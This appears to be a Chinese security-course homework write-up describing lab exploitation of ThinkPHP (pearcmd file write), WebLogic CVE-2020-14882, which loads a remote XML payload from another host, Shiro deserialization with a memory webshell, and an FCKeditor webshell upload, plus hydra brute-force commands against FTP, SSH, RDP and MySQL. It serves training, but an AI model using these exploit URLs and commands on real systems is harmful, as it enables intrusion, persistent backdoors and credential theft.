网络安全C10-2024.11.9

作业：

[if !supportLists]1、 [endif]RCE：分别实现ThinkPHP、Weblogic、Shiro漏洞的利用过程

ThinkPHP

（1）环境搭建

docker pull vulfocus/thinkphp:6.0.12

（2）启动容器，端口为8080

docker run -d -p 8080:80 vulfocus/thinkphp:6.0.12

（3）访问

http://111.231.53.36:8080/public/

查找pearcmd.php路径，路径为/usr/local/lib/php/pearcmd.php

find / -name pearcmd.php

前端测试是否存在pearcmd，访问路径，如果存在下图中的报错就确认存在

http://111.231.53.36:8080/public/?lang=../../../../../../../../usr/local/lib/php/pearcmd

Burp抓包修改编码，在文件根目录创建magedu3.php

111.231.53.36:8080/public/?lang=../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/+/var/www/html/magedu3.php

直接访问http://111.231.53.36:8080/magedu3.php

Weblogic

环境搭建

yum install -y docker-compose

sudo yum install git

git clone https://gitee.com/hundan-90/vulhub.git

在当前漏洞的文件夹下启动环境（docker -compose stop可以停止，docker -compose start启动，docker -compose down移除）

cd weblogic/

cd CVE-2020-14882/

docker compose up -d

访问111.231.53.36:7001/console，启动成功

访问http://111.231.53.36:7001/console/images/%252e%252e%252fconsole.portal

直接登录

构造xml文件，上传到dvwa

构造http://111.231.53.36:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://111.231.53.36:8085/hackable/uploads/rce.xml")

后台查看文件是否写入

docker exec -it f6ada029354f bash

cd /tmp/

ls

Shiro

开启时遇到报错ERROR: client version 1.22 is too old. Minimumsupported API version is 1.24, please upgrade your client to a newer version

将docker-compose.yml的version: '2'改为version: '2.1'即可解决

解决后成功启动

遇到问题：http://www.dnslog.cn/无法访问

解决方法：电脑的网络被墙了，开手机热点

使用软件进行漏洞检测

第二种 使用shiro_attack

点击爆破密钥得到密钥后，点击爆破利用链及回显发现回显方式

点击命令执行输入命令，网站拿下

注入内存马，将恶意文件存在内存里，可以躲避病毒查杀

通过冰蝎连接路径

1、FCKeditor编辑器漏洞实验；

Phpstudy搭建环境，把网站源码直接丢进根目录

注意php版本为5.4.45

虚拟机ip地址为192.168.40.129

使用御剑扫描判断是否使用FCKeditor

查看版本

http://192.168.40.129/Fckeditor/editor/dialog/fck_about.html

查找对应版本的漏洞信息，利用漏洞

http://192.168.40.129/FCKeditor/editor/fckeditor.html

发现报错，更改系统配置

更改配置后把url里的asp改为php，再次访问

192.168.40.129/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/php/connector.php

上传一句话木马，抓包修改，修改方式，php后加空格

上传成功

构造之前存在配置里的文件访问路径

http://192.168.40.129/FCKeditor/editor/filemanager/browser/default/images/file/info.php

使用FCK综合利用工具

bluecms旁注漏洞，并解释为什么旁站攻击可以拿下主站？跨库的意思是什么？

旁站攻击可以拿下主站的原因时旁站可能和主站部署在同一个服务器上

跨库的意思是A站点和b站点部署在同一个数据库上，拿下a站点就拿下了a站点的数据库，以A数据库为跳板就可以拿下b站点的数据库。

搭建网站，安装程序

数据库配置

访问http://192.168.40.129/bluecms/uploads/

网站安装成功

使用工具爆破目录

找admin密码，burp抓包爆破密码

暴力猜解：hydra实现对ftp、ssh、rdp、mysql的暴力破解。

Windows打开ftp

把密码字典放到root根目录

启动hydra开始破解，破解成功

hydra -l magedu -P pwd.txt 192.168.40.129 ftp -t 4 -vV

Ssh

安装ssh,配置环境

开始爆破

hydra -l user -P pwd.txt 192.168.40.129 ssh -t 4 -vV

Rdp

开启远程桌面服务

开始爆破

hydra -l user -P pwd.txt 192.168.40.129 rdp -t 4 -vV

Mysql爆破

开启数据库远程连接

grant all privileges on *.* to root@'%' identified by 'root';

开始爆破mysql

hydra -l root -P pwd.txt 192.168.40.129 mysql -t 4 -vV